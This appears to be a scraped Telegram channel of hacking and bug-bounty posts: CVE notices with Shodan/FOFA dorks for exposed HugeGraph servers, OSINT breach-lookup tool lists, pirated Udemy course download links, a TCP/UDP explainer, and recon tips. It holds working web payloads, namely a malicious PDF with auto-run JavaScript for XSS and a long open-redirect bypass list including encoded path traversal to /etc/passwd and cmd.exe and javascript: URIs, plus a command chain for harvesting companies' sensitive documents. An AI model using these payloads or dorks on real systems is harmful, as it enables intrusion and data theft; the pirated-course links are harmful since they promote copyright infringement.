Termux All Command [Telegram Group]

Sysinternals Suite : https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

🚨CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate. 💥POC: https://lnkd.in/g_v4h7Cg 👉Dorks: Hunter: /product.name="Apache HugeGraph" FOFA: app="HugeGraph-Studio" SHODAN: http.title:"HugeGraph"

Free Web Hosting For Everyone!! https://owrbit.com/free-web-hosting

⁌ 30 Free Resources to Check for Leaked Email Data and Account Information ⁍ ℣ Web-based Tools: 1. ℥ haveibeenpwned.com — Check in leaked databases 2. ℤ firefox.com/monitor — Mozilla's free breach monitoring service 3. Ω cybernews.com/personal-data-leak-check — Checks if your email was involved in data breaches 4. ℧ emailrep.io — Find websites where account has been registered by email 5. ⅏ breachdirectory.org — Search for leaked passwords and breach details 6. ⅎ intelx.io — Multifunctional search engine, including darknet searches (limited free searches) 7. ℩ ghostproject.fr — Search engine for data breaches (requires account) 8. ℺ avast.com/hackcheck — Free tool to check if your email has been compromised 9. ⅌ sec.hpi.de/ilc/search — Identity Leak Checker by Hasso Plattner Institute 10. ℻ leakpeek.com — Free tier available for searching leaked databases 11. ⅍ leak-lookup.com — Search engine for data breaches (free option available) 12. ℼ spycloud.com/check-your-exposure — Limited free checks for data exposure ⁌ GitHub Tools ⁍ 13. ℾ github.com/hmaverickadams/breach-parse — Tool for parsing breach data 14. ℿ github.com/D4Vinci/Cr3dOv3r — Credential reuse detection tool 15. ⅀ github.com/megadose/holehe — Email OSINT tool 16. ⅁ github.com/alpkeskin/mosint — Email OSINT investigation tool 17. ⅂ github.com/sham00n/buster — Advanced email reconnaissance tool 18. ⅃ github.com/woj-ciech/LeakLooker — Find open databases with sensitive data 19. ⅄ github.com/s0md3v/Photon — Web crawler and OSINT tool 20. ⅅ github.com/laramies/theHarvester — E-mails, subdomains and names harvester 21. ⅆ github.com/sherlock-project/sherlock — Hunt down social media accounts by username 22. ⅇ github.com/sundowndev/phoneinfoga — Advanced information gathering & OSINT tool for phone numbers 23. ⅈ github.com/mxrch/GHunt — Investigate Google accounts with emails 24. ⅉ github.com/khast3x/h8mail — Email OSINT and breach hunting tool 25. ⅊ github.com/vysecurity/LinkedInt — LinkedIn scraper for OSINT 26. ⅋ github.com/m4ll0k/Infoga — Email OSINT tool 27. ⅍ github.com/thewhiteh4t/pwnedOrNot — OSINT tool for finding passwords of compromised email addresses 28. ⅎ github.com/Ekultek/WhatBreach — OSINT tool to find breached emails, databases, and relevant information 29. ℀ github.com/SocialLinks-IO/social-analyzer — API, CLI, and Web App for social media analytics 30. ℁ github.com/WebBreacher/WhatsMyName — Username enumeration on various websites

🔰 SploitScan SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats. https://github.com/xaitax/SploitScan

🔍 𝑯𝒐𝒘𝑻𝒐𝑯𝒖𝒏𝒕: 𝑨 𝑮𝒖𝒊𝒅𝒆 𝒇𝒐𝒓 𝑾𝒆𝒃 𝑽𝒖𝒍𝒏𝒆𝒓𝒂𝒃𝒊𝒍𝒊𝒕𝒚 𝑯𝒖𝒏𝒕𝒆𝒓𝒔 🔍 Looking to sharpen your skills in bug hunting? HowToHunt provides a comprehensive collection of methodologies and test cases for a wide range of web vulnerabilities. Whether you're a beginner or an experienced researcher, this resource can help refine your approach and improve your detection techniques. https://github.com/KathanP19/HowToHunt

Course Name :x64dbg Script Programming For Reverse Engineering Udemy Link : https://www.udemy.com/course/x64dbg-script-programming/ Download Link : https://www.mediafire.com/file/x7s5xxxq7b3rlaj/[Freeeducationweb.com]+x64dbg+Script+Programming+For+Reverse+Engineering.rar/file

Course Name : BlackHat Live : Hands-On Hacking, No Theory Udemy Link : https://www.udemy.com/course/blackhat-live-hands-on-hacking-no-theory/ Download Link : https://www.mediafire.com/file/mk7cfc6znkz604c/[Freeeducationweb.com]+BlackHat+Live++Hands-On+Hacking,+No+Theory.rar/file

Course Name : Learn Network Hacking in 2025: Attacking Network Components Udemy Link : https://www.udemy.com/course/learn-network-hacking-in-2025-attacking-network-components/ Download Link : https://www.mediafire.com/file/oupdi52mwfkjk0a/[Freeeducationweb.com]+Learn+Network+Hacking+in+2025+Attacking+Network+Components.rar/file

TCP VS UDP! মজার উদাহরণ: ধরুন আপনি পার্টির আমন্ত্রণপত্র পাঠাচ্ছেন। TCP হলে আপনি আমন্ত্রণপত্র এক এক করে সবাইকে হাতে পৌঁছে দেবেন, নিশ্চিত হবেন কে আসতে পারবে আর কে পারবে না (ভদ্র) । আর UDP হলে আপনি আমন্ত্রণপত্রগুলো জানালা দিয়ে ছুঁড়ে দেবেন, আশা করবেন বাতাস ঠিক ঠিক করে সবাইকে পৌঁছে দেবে — কোনো ফলো-আপ নেই! 😄 (বেয়াদব) TCP (Transmission Control Protocol) বিশ্বস্ততা: TCP বার্তাগুলিকে সঠিক ক্রমে এবং সম্পূর্ণভাবে পৌঁছানোর নিশ্চয়তা দেয়। সংযোগ-ভিত্তিক: ডেটা পাঠানোর আগে TCP একটি সংযোগ স্থাপন করে। ত্রুটি যাচাইকরণ: হারানো ডেটা পুনরায় পাঠায় এবং ডেলিভারির সঠিকতা নিশ্চিত করে। UDP (User Datagram Protocol) অবিশ্বস্ত: UDP বার্তাগুলি সঠিকভাবে পৌঁছাবে বা ক্রম বজায় রাখবে, তার কোনো নিশ্চয়তা দেয় না। সংযোগহীন: UDP কোনো সংযোগের প্রয়োজন ছাড়াই সরাসরি বার্তা পাঠায়। ত্রুটি যাচাইকরণ নেই: UDP ডেটা পাঠায় তবে ডেলিভারি বা ত্রুটি সম্পর্কে কোনো খোঁজ রাখে না। বিঃদ্রঃ ChatGPT কত্ত সুন্দর একটা ইমেজ জেনারেট করে দিল । TCP vs UDP: Imagine you're sending party invitations. If it's TCP, you would hand-deliver each invitation one by one, making sure to confirm who can attend and who can't (polite approach). On the other hand, if it's UDP, you would just throw the invitations out of the window, hoping the wind will deliver them correctly to everyone—no follow-up! 😄 (rude approach) TCP (Transmission Control Protocol) Reliability: TCP ensures that messages are delivered in the correct order and in their entirety. Connection-based: TCP establishes a connection before sending data. Error Checking: It retransmits lost data and ensures the accuracy of delivery. UDP (User Datagram Protocol) Unreliable: UDP does not guarantee that messages will be delivered correctly or in order. Connectionless: UDP sends messages directly without needing a connection. No Error Checking: UDP sends data but does not track delivery or errors. P.S.: ChatGPT created such a beautiful image illustrating this!

💻 Download Windows Server 2025 ISO Now! 🖥 Visit this Microsoft website 🛡 License Keys for Installation Microsoft provides KMS product keys for evaluation: ⏩ Standard: TVRH6-WHNXV-R9WG3-9XRFY-MY832 ⏩ Datacenter: D764K-2NDRG-47T6Q-P8T8W-YP6DF ❕ After 180 days of evaluation, you must replace these keys with a purchase key to permanently activate the server.

CVE-2024-8963 : Path Traversal Severity: Critical Cvss-Score: 9.1 reference: https://lnkd.in/dRzRVQ5C Poc Video Link : https://lnkd.in/dU4ndg3B

WPE Tools : https://github.com/Tib3rius/Windows-PrivEsc-Setup https://github.com/frizb/Windows-Privilege-Escalation https://github.com/0dayhunter/Windows-Privilege-Escalation-Resources

Cyber-Sec-Resources : https://github.com/scspcommunity/Cyber-Sec-Resources/tree/master

I hate recon but here a good tip : 1 - Get the company IPs range X.X.X.X/24 2 - Run nmap -p 80,448,8080 IP/24 -oN file.txt 3 - Use any IP extractor or API in case of automation or bash then save it on IPs.txt 4- run httpx -l IPs.txt -o final.txt 5 - run nuclei -l final.txt post by:-oxRAYAN7

🔥 Reduce Noise in Burp Suite with This Simple Trick! 🔥 Are you tired of unnecessary traffic cluttering your Burp Suite logs? Here’s a quick way to streamline your testing by filtering out background noise. 💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through: .*\.google\.com .*\.gstatic\.com .*\.googleapis\.com .*\.pki\.goog .*\.mozilla\..*

bug bounty tip 1- if you can Found PDF upload function theb 2- created new file called tojojo.pdf 3- put the content inside it and upload then open it and XSS boom content:- %PDF-1.7 1 0 obj <</Pages 1 0 R /OpenAction 2 0 R >> 2 0 obj <</S /JavaScript /JS (app.alert(1)) >> trailer <</Root 1 0 R>>

Collection of hashtag#GitHub Repositories for 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 / 𝗣𝗲𝗻𝘁𝗲𝘀𝘁𝗶𝗻𝗴 / 𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 / 𝗥𝗲𝗱 𝗧𝗲𝗮𝗺 / 𝗠𝗮𝗹𝘄𝗮𝗿𝗲 / 𝗪𝗲𝗯𝟯 / 𝗕𝗹𝗼𝗰𝗸𝗰𝗵𝗮𝗶𝗻. 1. 𝗕𝗼𝗼𝗸 𝗼𝗳 𝗦𝗲𝗰𝗿𝗲𝘁 𝗞𝗻𝗼𝘄𝗹𝗲𝗱𝗴𝗲 [𝟭𝟬𝟬𝟬+ 𝗰𝗼𝗺𝗽𝗶𝗹𝗮𝘁𝗶𝗼𝗻𝘀 𝗼𝗳 𝗩𝗮𝗿𝗶𝗼𝘂𝘀 𝗵𝗮𝗰𝗸𝗶𝗻𝗴/𝗽𝗲𝗻𝘁𝗲𝘀𝘁𝗶𝗻𝗴 𝗺𝗲𝘁𝗵𝗼𝗱𝗼𝗹𝗼𝗴𝗶𝗲𝘀]= https://lnkd.in/g2ft3ef 2. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 = https://lnkd.in/gK-WZSi 3. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 𝗧𝗼𝗼𝗹𝘀 = https://lnkd.in/dRbMV__z 4. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗣𝗲𝗻𝗲𝘁𝗿𝗮𝘁𝗶𝗼𝗻 𝗧𝗲𝘀𝘁𝗶𝗻𝗴 = https://lnkd.in/fE3y_J3 5. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗪𝗲𝗯 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 = https://lnkd.in/fZrtWu6 6. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀 = https://lnkd.in/gjgwnZU 7. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗣𝗲𝗻𝘁𝗲𝘀𝘁 = https://lnkd.in/gBWKeiY 8. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗥𝗲𝗱 𝗧𝗲𝗮𝗺𝗶𝗻𝗴 = https://lnkd.in/gCiPtCx 9. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗪𝗲𝗯 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 = https://lnkd.in/gptAkXx 10. 𝗣𝗲𝗻𝗲𝘁𝗿𝗮𝘁𝗶𝗼𝗻 𝗧𝗲𝘀𝘁 𝗚𝘂𝗶𝗱𝗲 𝗯𝗮𝘀𝗲𝗱 𝗼𝗻 𝗢𝗪𝗔𝗦𝗣 = https://lnkd.in/fq6imnb 11. 𝗣𝗲𝗻𝘁𝗲𝘀𝘁 𝗖𝗼𝗺𝗽𝗶𝗹𝗮𝘁𝗶𝗼𝗻 = https://lnkd.in/gV2PWnx 12. 𝗜𝗻𝗳𝗼𝘀𝗲𝗰 𝗥𝗲𝗳𝗲𝗿𝗲𝗻𝗰𝗲 = https://lnkd.in/dAjYxTpu 13. 𝗪𝗲𝗯𝟯 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀 𝗛𝘂𝗯 = https://lnkd.in/d3xSAKR9 14. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗕𝗹𝗼𝗰𝗸𝗰𝗵𝗮𝗶𝗻 𝗧𝗲𝘀𝘁𝗶𝗻𝗴 = https://lnkd.in/dxsTfTxc 15. 𝗔𝘄𝗲𝘀𝗼𝗺𝗲 𝗠𝗮𝗹𝘄𝗮𝗿𝗲 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 = https://lnkd.in/dSVfuuJ7

My hacker's trick to find confidential and sensitive documents of organisations and companies in less than 1 minute: 1. katana -u subdomainsList -em pdf,docx | tee endpointsPDF_DOC 2. grep -i 'redacted.*\.pdf$' endpointsPDF_DOC | sed -E 's/[-_]?redacted//gi' | sort -u | httpx -mc 200 -sc

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd